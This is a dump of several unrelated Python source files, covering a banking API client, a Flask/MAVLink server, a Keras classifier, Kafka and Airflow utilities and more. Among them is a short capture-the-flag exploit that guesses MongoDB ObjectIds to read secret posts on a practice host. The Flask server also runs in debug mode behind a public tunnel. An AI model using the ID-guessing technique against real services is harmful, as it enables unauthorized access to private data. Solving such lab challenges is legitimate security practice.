def _on(f):\r\n self._add_event_handler(event, f, f)\r\n return f\r\n if f is None:\r\n return _on\r\n else:\r\n return _on(f)\r\n\r\n def _add_event_handler(self, event, k, v):\r\n self.emit('new_listener', event, k)\r\n with self._lock:\r\n self._events[event][k] = v\r\n\r\n def _emit_handle_potential_error(self, event, error):\r\n if event == 'error':\r\n if error:\r\n raise error\r\n else:\r\n raise ClientError(\"Uncaught, unspecified 'error' event.\")\r\n\r\n def _call_handlers(self, event, args, kwargs):\r\n handled = False\r\n with self._lock:\r\n funcs = list(self._events[event].values())\r\n for f in funcs:\r\n self._emit_run(f, args, kwargs)\r\n handled = True\r\n return handled\r\n\r\n def emit(self, event, *args, **kwargs):\r\n handled = self._call_handlers(event, args, kwargs)\r\n if not handled:\r\n self._emit_handle_potential_error(event, args[0] if args else None)\r\n return handled\r\n\r\n def _emit_run(self, f, args, kwargs):\r\n try:\r\n coro = f(*args, **kwargs)\r\n except Exception as exc:\r\n self.emit('error', exc)\r\n else:\r\n if iscoroutine(coro):\r\n if self._loop:\r\n f = ensure_future(coro, loop=self._loop)\r\n else:\r\n f = ensure_future(coro)\r\n elif isinstance(coro, Future):\r\n f = coro\r\n else:\r\n f = None\r\n\r\n if f:\r\n @f.add_done_callback\r\n def _callback(f):\r\n if f.cancelled():\r\n return\r\n\r\n exc = f.exception()\r\n if exc:\r\n self.emit('error', exc)\r\n\r\n async def get_contacts(self):\r\n \"\"\"|coro|\r\n\r\n Method which retrieves all the contacts.\r\n\r\n Returns\r\n ---------\r\n list: contacts\r\n a list of disctionary objects containing all the details for each contacts.\r\n [{contact1}, {contact2}, {contact3}]\r\n\r\n Raises\r\n --------\r\n ClientError\r\n Bad request while fetching contacts.\r\n HTTPException\r\n Failed to login.\r\n \"\"\"\r\n data = await self.http.get_contacts()\r\n return data\r\n \r\n async def add_contact(self, name=None, account=None):\r\n \"\"\"|coro|\r\n\r\n Method to add a contact.\r\n\r\n Returns\r\n ---------\r\n dict: contact\r\n a dictionary object of the added contact\r\n {contact}\r\n\r\n Raises\r\n --------\r\n MissingRequiredFields\r\n Missing a required field (account number or name).\r\n InvalidContent\r\n Invalid account number.\r\n ClientError\r\n Bad request while fetching contacts.\r\n HTTPException\r\n Failed to login.\r\n DuplicateContent\r\n Account number is already saved in your contacts.\r\n Along with the error message it will print \r\n the name of the duplicate.\r\n \"\"\"\r\n data = await self.http.add_contact(name, account)\r\n return data\r\n\r\n async def delete_contact(self, account=None):\r\n \"\"\"|coro|\r\n\r\n Method to delete a contact.\r\n\r\n Returns\r\n ---------\r\n str: notice\r\n 'Contact removed successfully'\r\n\r\n Raises\r\n --------\r\n MissingRequiredFields\r\n Missing the contact details (account number or name or id).\r\n InvalidContent\r\n Contact is not found in your list of contacts.\r\n ClientError\r\n Bad request while deleting contact.\r\n HTTPException\r\n Failed to login.\r\n \"\"\"\r\n data = await self.http.delete_contact(account)\r\n return data\r\n\r\n async def get_history(self) -> dict:\r\n \"\"\"|coro|\r\n\r\n Method which retrieves the account history.\r\n\r\n Returns\r\n ---------\r\n dict: transactions\r\n Dictionary object containing transactions relating to each account.\r\n {account1:{[{transaction1},{transaction2}]},account2:{[{transaction1},{transaction2}]},}\r\n\r\n transaction:\r\n {'date': 'date', 'sender': 'sender', 'amount': 'amount', 'minus': True/False, 'balance': 'uncleared amount', \r\n 'description': 'Type of transaction'}\r\n\r\n Raises\r\n --------\r\n HTTPException\r\n Bad request while fetching transactions.\r\n \"\"\"\r\n data = await self.http.get_history()\r\n return data\r\n\r\n async def start(self):\r\n \"\"\"|coro|\r\n An asynchronous call which starts the BML event loop.\r\n listen for new transactions using a decorator like:\r\n @aiobmlclient.event('new_transaction')\r\n async def data_handler(data):\r\n print(data)\r\n\r\n Note\r\n --------\r\n Will fire all the transactions within last 24hrs at the app reboot.\r\n Use a db to make sure that you arnt notified of the same transaction.\r\n \"\"\"\r\n while True:\r\n mybank = await self.http.get_history()\r\n if mybank:\r\n for accounts in mybank:\r\n for transaction in mybank[accounts]:\r\n transaction.pop('balance')\r\n if (transaction not in self.transactions):\r\n self.emit('new_transaction', transaction)\r\n self.transactions.append(transaction)\r\n await asyncio.sleep(30)\r\n","sub_path":"aiobml/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"578153490","text":"from flask import Flask, render_template\nfrom pymavlink import mavutil\nfrom msgdef import *\nimport socket\nimport os\nimport threading\n\nHOST = '127.0.0.1' #Server IP address\nPORT = 65432 #Server port\nfirstTime = True #Indicates whether its the first time to call my_server()\ndata_view = \"\"\"\"\"\" #Store data to view on webpage\nbufferSize = 512\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/init')\ndef init():\n server()\n\n@app.route('/data')\ndef data():\n return f\"\"\"\"\"\"+ data_view +''\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\ndef server():\n global data_view\n global firstTime\n\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a UDP socket\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #Allow socket to reuse port\n s.bind((HOST, PORT)) #Bind socket to port\n\n sensorConnection = mavutil.mavlink_connection('udpin:localhost:14540') #Create a MAVLink connection to receive sensor data\n\n if firstTime:\n # Indicating the server has started\n print(\"Server Started waiting for clients to connect \")\n firstTime = False\n receiveDataAndSendActuatorSignal(sensorConnection, s) \n\ndef receiveDataAndSendActuatorSignal(mavlink, socket):\n global data_view\n\n with socket:\n while True:\n try:\n data, addr = socket.recvfrom(bufferSize) #Receive UDP client port\n except:\n data = b''\n if len(data) != 0: #Checks if UDP client is connected\n imu_msg = mavlink.recv_match(type='HIGHRES_IMU', blocking=True, timeout = 0.001) #Receive sensor data through MAVLink\n if imu_msg == None:\n continue #Restart loop if no data is received \n print(imu_msg)\n\n actuatorSignal = imu_msg.xacc * 1.5 #Generate some actuator signal\n encodedData = str(actuatorSignal).encode('utf-8') # Encoding the signal\n socket.sendto(encodedData, addr) # Send the byte stream to client\n\n data_view = f'''Actuator Signal: {actuatorSignal}
X Acceleration: {imu_msg.xacc}
\n Y Acceleration: {imu_msg.yacc}
Z Acceleration: {imu_msg.zacc}
\n X Gyro: {imu_msg.xgyro}
Y Gyro: {imu_msg.ygyro}
\n Z Gyro: {imu_msg.zgyro}
''' + data_view\n\ndef url():\n os.system('cmd /k \"lt --port 5000\"')\n\nif __name__ == '__main__':\n threading.Thread(target=url).start() #Start local tunnel\n app.run(debug=True, host='0.0.0.0') #Build the Flask app","sub_path":"UDP MAVLink Server/serverPi.py","file_name":"serverPi.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"286720917","text":"\"\"\"\nRank related code\n\"\"\"\n\nfrom scipy.stats import rankdata\n\n\ndef rank_artists(data, ranks, age_range=None, distances=None):\n \"\"\"\n Ranks artists based on different criteria.\n @param distances: distances to film set calculated for all artists\n @param age_range: tuple with age range artists has been filtered by\n @param ranks: string containing requested ranks\n @param data: Artists data\n \"\"\"\n all_ranks = []\n try:\n for rank in ranks.split(','):\n rank_key, unused_, weight = rank.partition(':')\n if rank_key == 'age':\n if age_range:\n middle_age_range = age_range[0] + ((age_range[1] - age_range[0]) / 2.0)\n else:\n ages = [a['age'] for a in data['artists']]\n min_age = min(ages)\n max_age = max(ages)\n middle_age_range = min_age + (max_age - min_age) / 2.0\n r = rankdata([abs(middle_age_range - a[rank_key]) for a in data['artists']])\n elif rank_key == 'distance':\n r = rankdata([distances[a['uuid']] for a in data['artists']])\n else:\n r = rankdata([a[rank_key] for a in data['artists']])\n if weight:\n try:\n weight = float(weight)\n except ValueError:\n raise TypeError('Wrong rank requested!')\n r = [e * weight for e in r]\n all_ranks.append(r)\n except KeyError:\n raise TypeError('Wrong rank requested!')\n else:\n ranks = {r[0]: sum(r[1:]) for r in zip((a['uuid'] for a in data['artists']), *all_ranks)}\n data['artists'].sort(key=lambda x: ranks[x['uuid']])\n","sub_path":"the_artist/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"28492708","text":"#!/bin/python\n\n# This is a program to calculate a buy range for a proper buy point.\n# It adds 5% to the proper buy point.\n\n\ndef stkData():\n ni = i.upper()\n b = input('Buy point? ')\n t = float(b) * 1.05\n t = round(t, 2)\n print(str(i) + ' -- ' + str(b) + ' -- ' + str(t))\n txt = str(ni) + ' -- ' + str(b) + ' -- ' + str(t)\n f.write(str(txt))\n f.write(\"\\n\")\n f.write(\"\\n\")\n\n\nf = open(\"/home/sot/Desktop/buyRange.txt\", \"a\")\nwhile True:\n i = input('Symbol? ')\n if i == '':\n f.close()\n break\n stkData()\n","sub_path":".local/bin/buyRange.py","file_name":"buyRange.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"90380195","text":"import requests, string, itertools\n\n# mongodb object id rule\n# 4byte(timestamp) + 5byte(machine based random) + 3byte(index count)\n# guess available for timestamp, indexcount\n\n# api/board/:query_no doesn't check if it's secret(READ CODE!!)\npost_1 = '64 11 5d 59 c30c6c4f03 502e1c'\npost_2 = '64 11 5d 5e c30c6c4f03 502e1d'\npost_4 = '64 11 5d 61 c30c6c4f03 502e1f'\n\nalpha_nums = list(string.ascii_lowercase + string.digits)\nperms = itertools.permutations(alpha_nums, 2)\n\n# for i in perms:\nfor i in ['5f', '60']:\n query_no = f'64115d{i}c30c6c4f03502e1e'\n res = requests.get(f'http://host3.dreamhack.games:12830/api/board/{query_no}')\n print(f'{query_no} : {res.status_code}')\n print(res.content)","sub_path":"web_hacking/problems/lv1-mongoboard/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"342115225","text":"# Use the probability(hand, deck) function in this file \r\n# to calculate the probability of getting a certain hand \r\n# given a randomly shuffled deck.\r\n\r\n# The main() function in this file\r\n# computes the probability of getting all possible hands\r\n# given a randomly shuffled deck containing 7 copper and 3 estate.\r\n\r\n# Michael Chu\r\n# 5/22/20\r\n\r\nimport math\r\n\r\nHANDSIZE = 5\r\n\r\n# Returns the number of spots left in the hand we're trying to build (given a certain base b)\r\ndef spotsLeft(b):\r\n spots = HANDSIZE\r\n for n in b.values():\r\n spots = spots - n\r\n return spots\r\n\r\n# Calculates n choose r\r\ndef nCr(n,r):\r\n f = math.factorial\r\n return f(n)/(f(r)*f(n-r))\r\n\r\n# Calculates the number of cards in deck d\r\ndef nCards(d):\r\n count = 0\r\n for n in d.values():\r\n count += n\r\n return count\r\n\r\n# Returns all possible hands of 5 cards given a certain base and a certain deck\r\ndef hands(deck,base={}):\r\n # Makes copies so as to not disturb the originals\r\n d = deck.copy()\r\n b = base.copy()\r\n\r\n # If the deck is empty, return base (as long at it is a valid hand)\r\n if len(d)==0:\r\n spots = spotsLeft(b)\r\n if spots > 0:\r\n return []\r\n elif spots == 0:\r\n return [b]\r\n else:\r\n return [\"INVALID HAND\"]\r\n\r\n # Otherwise... Pick a card type from the deck \r\n cardType = list(d)[0]\r\n amount = d[cardType]\r\n \r\n # Update the deck\r\n del d[cardType]\r\n\r\n # Figure out how many spots in the hand are left\r\n spots = spotsLeft(b)\r\n\r\n # Generate hands with i of the card type\r\n handList = []\r\n for i in range(0,min(spots,amount)+1):\r\n b[cardType] = i\r\n handList += hands(d,b)\r\n\r\n return handList\r\n\r\n# Calculates probability of getting a certain hand given a randomly shuffled deck\r\ndef probability(hand,deck):\r\n successes = 1\r\n for card,amount in hand.items(): \r\n successes = successes*nCr(deck[card],amount)\r\n possible = nCr(nCards(deck),5)\r\n\r\n prob = successes/possible\r\n return prob\r\n\r\ndef main():\r\n deck = {\"copper\":7,\r\n \"estate\":3}\r\n print(\"Deck: \",deck)\r\n print()\r\n\r\n possibleHands = hands(deck)\r\n print(\"Possible Hands:\")\r\n print(possibleHands)\r\n print()\r\n\r\n print(\"Probabilities:\")\r\n probabilities = {}\r\n for hand in possibleHands:\r\n prob = probability(hand,deck)\r\n print(hand,prob)\r\n probabilities[tuple(hand.items())] = prob\r\n print()\r\n print(probabilities)\r\n print()\r\n\r\n sum = 0\r\n for prob in probabilities.values():\r\n sum += prob\r\n print(\"Sum of Probabilities: \",sum)\r\n\r\nmain()\r\n","sub_path":"probabilities.py","file_name":"probabilities.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"278435494","text":"from flask import current_app as app\n\n@app.route('/HOOK',methods = ['POST','GET'])\ndef webhook():\n\tif request.method == \"POST\":\n\t\tupdate = telegram.Update.de_json(request.get_json(force=True),bot)\n\t\tdispatcher.process_update(update)\n\t\tupdate_queue.put(update)\n\t\treturn \"OK\"\n\telse:\n\t\treturn \"You are browser!\"\n\n\n\n#Set_webhook\n@app.route('/set_webhook', methods = ['GET', 'POST'])\ndef set_webhook():\n\ts = bot.setWebhook('https://%s:443/HOOK' % URL, certificate = open('/etc/ssl/admin/server.crt','rb'))\n\tif s:\n\t\tprint(s)\n\t\treturn \"webhook setup ok\"\n\telse:\n\t\treturn \"webhook setup failed\"\n \n \n","sub_path":"bot/application-bot/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"61598553","text":"from random import randint\nfrom time import sleep\nfrom operator import itemgetter\njogo = {'jogador1': randint(1, 6),\n 'jogador2': randint(1, 6),\n 'jogador3': randint(1, 6),\n 'jogador4': randint(1, 6)}\nprint('- ' * 20)\nranking = []\nsleep(1)\nfor k, v in jogo.items():\n print(f'{k} jogou {v} no dado.')\n sleep(1)\nprint('- ' * 20)\nranking = sorted(jogo.items(), key=itemgetter(1), reverse=True)\nfor i, d in enumerate(ranking):\n print(f'{i + 1}º lugar: {d[0]} com {d[1]}')\n","sub_path":"Desafios/des091a.py","file_name":"des091a.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"264498547","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import BookingForm\nfrom django.contrib import messages\nfrom .models import Booking\nfrom django.core.urlresolvers import reverse\n\ndef booking_create(request):\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"successfully created\")\n return reverse(request, 'booking/detail.html', instance.get_absolute_url())\n else:\n messages.error(request, \"Not Successfully Created\")\n context = {\n \"form\": form,\n }\n return render(request, 'booking/form.html', context)\n\ndef booking_detail(request):\n instance = get_object_or_404(booking_create)\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n }\n return render(request, 'booking/detail.html', context)\n\ndef booking_list(request):\n queryset = Booking.objects.all()\n context = {\n \"object_list\": queryset,\n \"title\": \"List\"\n }\n return render(request, 'booking/list.html', context)\n\ndef booking_edit(request):\n instance = get_object_or_404(Booking, id=id)\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, \"Item Saved\", extra_tags='html_safe')\n return redirect(instance.get_absolute_url())\n\n context = {\n \"id\": instance.id,\n \"instance\": instance,\n \"form\": form,\n }\n return render(request, \"\", context)\n\ndef booking_delete(request):\n instance = get_object_or_404(Booking)\n instance.delete()\n messages.success(request, \"Successfully deleted\")\n return redirect(\"booking:list\")","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"124135042","text":"# from openvino.inference_engine import IENetwork, IEPlugin\nimport numpy as np\nimport cv2\nimport time\nimport sys\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport os\nimport glob\nfrom tqdm import tqdm\n# 실시간 추적 모듈 sort 사용\nfrom sort import *\n\ncam_w = 320\ncam_h = 240\nimage_size = 416\n\n# cam에 맞는 size로 맞추기 위한 w,h\nnew_w = int(cam_w * min(image_size/cam_w, image_size/cam_h))\nnew_h = int(cam_h * min(image_size/cam_w, image_size/cam_h))\n\nxml_path = '/home/pi/workspace/IR/tiny-yolov3.xml'\nbin_path = '/home/pi/workspace/IR/tiny-yolov3.bin'\n\nLABELS = (\"person\", \"bicycle\", \"car\", \"motorbike\", \"aeroplane\",\n \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\",\n \"fire hydrant\", \"stop sign\", \"parking meter\", \"bench\", \"bird\",\n \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\",\n \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\",\n \"umbrella\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\",\n \"skis\", \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\",\n \"baseball glove\", \"skateboard\", \"surfboard\",\"tennis racket\", \"bottle\",\n \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\",\n \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\",\n \"broccoli\", \"carrot\", \"hot dog\", \"pizza\", \"donut\",\n \"cake\", \"chair\", \"sofa\", \"pottedplant\", \"bed\",\n \"diningtable\", \"toilet\", \"tvmonitor\", \"laptop\", \"mouse\",\n \"remote\", \"keyboard\", \"cell phone\", \"microwave\", \"oven\",\n \"toaster\", \"sink\", \"refrigerator\", \"book\", \"clock\",\n \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\")\n\n# network 생성\n# net = IENetwork(model = xml_path,weights = bin_path)\n\n# device (MYRIAD : NCS2)\n# plugin = IEPlugin(device='MYRIAD')\n# exec_net = plugin.load(net)\n\n# cam on/cam setting\ncam = cv2.VideoCapture(0)\ncam.set(cv2.CAP_PROP_FPS, 30)\ncam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_w)\ncam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_h)\n\nwhile(True) :\n # frame preprossing\n ret, frame = cam.read()\n resized_image = cv2.resize(frame, (image_size, image_size), interpolation=cv2.INTER_CUBIC)\n\n # 128로 채운다\n canvas = np.full((image_size, image_size, 3), 128)\n canvas[(image_size - new_h) // 2:(image_size - new_h) // 2 + new_h, (image_size - new_w) // 2:(image_size - new_w) // 2 + new_w, :] = resized_image\n\n prepimg = canvas\n\n prepimg = resized_image[np.newaxis, :, :, :] # Batch size axis add\n prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW\n\n start = time.time()\n\n cv2.imshow('image', prepimg)\n # inference\n # res = exec_net.infer({'inputs': prepimg})\n\n end = time.time()\n\n print('inference time : ', end - start)\n\n\n\n k = cv2.waitKey(10) & 0xFF\n if k == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"openvino.py","file_name":"openvino.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"329179178","text":"# -*- coding: utf-8 -*-\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport time\nimport random\n\nfrom sqlalchemy import event, exc, select\n\nfrom airflow.utils.log.logging_mixin import LoggingMixin\n\nlog = LoggingMixin().log\n\n\ndef setup_event_handlers(\n engine,\n reconnect_timeout_seconds,\n initial_backoff_seconds=0.2,\n max_backoff_seconds=120):\n\n @event.listens_for(engine, \"engine_connect\")\n def ping_connection(connection, branch):\n \"\"\"\n Pessimistic SQLAlchemy disconnect handling. Ensures that each\n connection returned from the pool is properly connected to the database.\n\n http://docs.sqlalchemy.org/en/rel_1_1/core/pooling.html#disconnect-handling-pessimistic\n \"\"\"\n if branch:\n # \"branch\" refers to a sub-connection of a connection,\n # we don't want to bother pinging on these.\n return\n\n start = time.time()\n backoff = initial_backoff_seconds\n\n # turn off \"close with result\". This flag is only used with\n # \"connectionless\" execution, otherwise will be False in any case\n save_should_close_with_result = connection.should_close_with_result\n\n while True:\n connection.should_close_with_result = False\n\n try:\n connection.scalar(select([1]))\n # If we made it here then the connection appears to be healty\n break\n except exc.DBAPIError as err:\n if time.time() - start >= reconnect_timeout_seconds:\n log.error(\n \"Failed to re-establish DB connection within %s secs: %s\",\n reconnect_timeout_seconds,\n err)\n raise\n if err.connection_invalidated:\n log.warning(\"DB connection invalidated. Reconnecting...\")\n\n # Use a truncated binary exponential backoff. Also includes\n # a jitter to prevent the thundering herd problem of\n # simultaneous client reconnects\n backoff += backoff * random.random()\n time.sleep(min(backoff, max_backoff_seconds))\n\n # run the same SELECT again - the connection will re-validate\n # itself and establish a new connection. The disconnect detection\n # here also causes the whole connection pool to be invalidated\n # so that all stale connections are discarded.\n continue\n else:\n log.error(\n \"Unknown database connection error. Not retrying: %s\",\n err)\n raise\n finally:\n # restore \"close with result\"\n connection.should_close_with_result = save_should_close_with_result\n\n\n @event.listens_for(engine, \"connect\")\n def connect(dbapi_connection, connection_record):\n connection_record.info['pid'] = os.getpid()\n\n\n @event.listens_for(engine, \"checkout\")\n def checkout(dbapi_connection, connection_record, connection_proxy):\n pid = os.getpid()\n if connection_record.info['pid'] != pid:\n connection_record.connection = connection_proxy.connection = None\n raise exc.DisconnectionError(\n \"Connection record belongs to pid {}, \"\n \"attempting to check out in pid {}\".format(connection_record.info['pid'], pid)\n )\n","sub_path":"airflow/utils/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"588685759","text":"import json\nimport os\nimport wget\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 3\"\n\n# Load sarcasm dataset\ndata_dir = 'sarcasm'\nfilename = os.path.join(data_dir, 'sarcasm.json')\nif not os.path.exists(data_dir):\n # Download dataset\n os.mkdir(data_dir)\n url = 'https://storage.googleapis.com/laurencemoroney-blog.appspot.com/sarcasm.json'\n filename = wget.download(url, out=data_dir)\n\nwith open(filename, 'r') as f:\n datastore = json.load(f)\n\nvocab_size = 10000\nembedding_dim = 16\nmax_length = 100\ntrunc_type = 'post'\npadding_type = 'post'\noov_tok = \"\"\ntraining_size = 20000\n\nsentences = []\nlabels = []\n\nfor item in datastore:\n sentences.append(item['headline'])\n labels.append(item['is_sarcastic'])\n\ntraining_sentences = sentences[0:training_size]\ntesting_sentences = sentences[training_size:]\ntraining_labels = labels[0:training_size]\ntesting_labels = labels[training_size:]\n\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\ntokenizer.fit_on_texts(training_sentences)\n\nword_index = tokenizer.word_index\n\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\ntraining_padded = pad_sequences(training_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\ntesting_padded = pad_sequences(testing_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\n# Need this block to get it to work with TensorFlow 2.x\n\ntraining_padded = np.array(training_padded)\ntraining_labels = np.array(training_labels)\ntesting_padded = np.array(testing_padded)\ntesting_labels = np.array(testing_labels)\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, input_length=max_length),\n tf.keras.layers.GlobalAveragePooling1D(),\n tf.keras.layers.Dense(24, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\n\nnum_epochs = 30\nhistory = model.fit(training_padded, training_labels, epochs=num_epochs,\n validation_data=(testing_padded, testing_labels), verbose=2)\n\n\ndef plot_graphs(history, string):\n plt.plot(history.history[string])\n plt.plot(history.history['val_' + string])\n plt.xlabel(\"Epochs\")\n plt.ylabel(string)\n plt.legend([string, 'val_' + string])\n plt.show()\n\n\nplot_graphs(history, \"accuracy\")\nplot_graphs(history, \"loss\")\n\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n\ndef decode_sentence(text):\n return ' '.join([reverse_word_index.get(i, '?') for i in text])\n\n\nprint(decode_sentence(training_padded[0]))\nprint(training_sentences[2])\nprint(labels[2])\n\ne = model.layers[0]\nweights = e.get_weights()[0]\nprint(weights.shape) # shape: (vocab_size, embedding_dim)\n\nsentence = [\"granny starting to fear spiders in the garden might be real\",\n \"game of thrones season finale showing this sunday night\"]\nsequences = tokenizer.texts_to_sequences(sentence)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\nprint(model.predict(padded))\n\n# End of file tag\nprint('eof')\n","sub_path":"_35_SarcasmClassifier.py","file_name":"_35_SarcasmClassifier.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"61060928","text":"import os\r\nimport logging\r\nimport datetime\r\nimport time\r\nimport pymysql\r\nimport configparser\r\nfrom confluent_kafka import KafkaError,Consumer,KafkaException\r\nfrom bson import json_util, ObjectId\r\nfrom bson.json_util import dumps,loads,JSONOptions,DEFAULT_JSON_OPTIONS\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n\"\"\" 创建一个从KAFKA数据库拉取数据的类\"\"\"\r\n\"\"\"從未加認證的主機接數據\"\"\"\r\nclass Fetch(object) :\r\n\t\"\"\"重写类的初始化属性\"\"\"\r\n\tdef __init__(self) :\r\n\t\tself.config = configparser.RawConfigParser()\r\n\t\tself.config.read('./config.cfg')\r\n\t\tif not os.path.exists('./Log'):\r\n\t\t\tos.makedirs('./Log')\r\n\t\tlogging.basicConfig(filename='./Log/'+datetime.datetime.today().strftime(\"%Y%m%d\")+'.log'\r\n\t\t\t, level=logging.INFO\r\n\t\t\t, format='%(asctime)s %(message)s'\r\n\t\t\t, datefmt='%Y/%m/%d %I:%M:%S %p')\r\n\t\t\r\n\t\t\"\"\"建立与kafka数据库连接的客户端,group.id随意命名,保证其他人没有在使用这个id,因为一个id只能拉取一次数据,每次拉取数据都拉取七天前到现在的数据\"\"\"\r\n\t\ttry :\r\n\t\t\tSource_Kafka_Consumer = Consumer({\r\n\t\t\t\t\t'bootstrap.servers':'xx.xx.xx.xx:xx'\r\n\t\t\t\t\t,'group.id':'careyfetch'\r\n\t\t\t\t\t,'auto.offset.reset':'earliest'\r\n\t\t\t\t\t, 'session.timeout.ms': 6000\r\n\t\t\t\t\t})\r\n\t\t\tDEFAULT_JSON_OPTIONS.strict_uuid = True\r\n\t\t\tSource_Kafka_Consumer.subscribe(['xxx.xxx.xxx'])\t\t#指定要拉取哪个topic的数据\r\n\t\t\tself.consumer = Source_Kafka_Consumer\r\n\t\texcept Exception as inst:\r\n\t\t\tprint('kafaka Connection Fail')\r\n\t\t\tprint(inst)\r\n\t\t\tlogging.error('kafaka Connection Fail')\r\n\t\t\tlogging.error(inst)\r\n\t\r\n\t\"\"\"这是一个从kafka数据库拉取数据的函数范例\"\"\"\r\n\tdef fetch_xxxx(self):\r\n\t\ttry:\r\n\t\t\tonelist = []\r\n\t\t\tcount = 0\r\n\t\t\twhile True:\r\n\t\t\t\t\"\"\"通过创建好连接kafka客服端和相关参数,拉取数据\"\"\"\r\n\t\t\t\tmsg = self.consumer.poll(1)\r\n\t\t\t\tif msg is None:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif msg.error():\r\n\t\t\t\t\tprint('Consumer error: {}'.format(msg.error()))\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\"\"\"取出数据,和存储数据\"\"\"\r\n\t\t\t\tdata = json_util.loads(msg.value())\r\n\t\t\t\tonelist.append(data)\r\n\t\t\t\tcount = count + 1\r\n\t\t\t\tif count == 1000 :\r\n\t\t\t\t\tbreak\r\n\t\t\tself.consumer.close()\r\n\t\texcept Exception as inst:\r\n\t\t\t\tprint('kafaka fetch meterbase Fail')\r\n\t\t\t\tprint(inst)\r\n\t\t\t\tlogging.error('happen kafaka fecth meterbase Fail')\r\n\t\t\t\tlogging.error(inst)\r\n\t\treturn onelist\r\n","sub_path":"fetchkafka.py","file_name":"fetchkafka.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
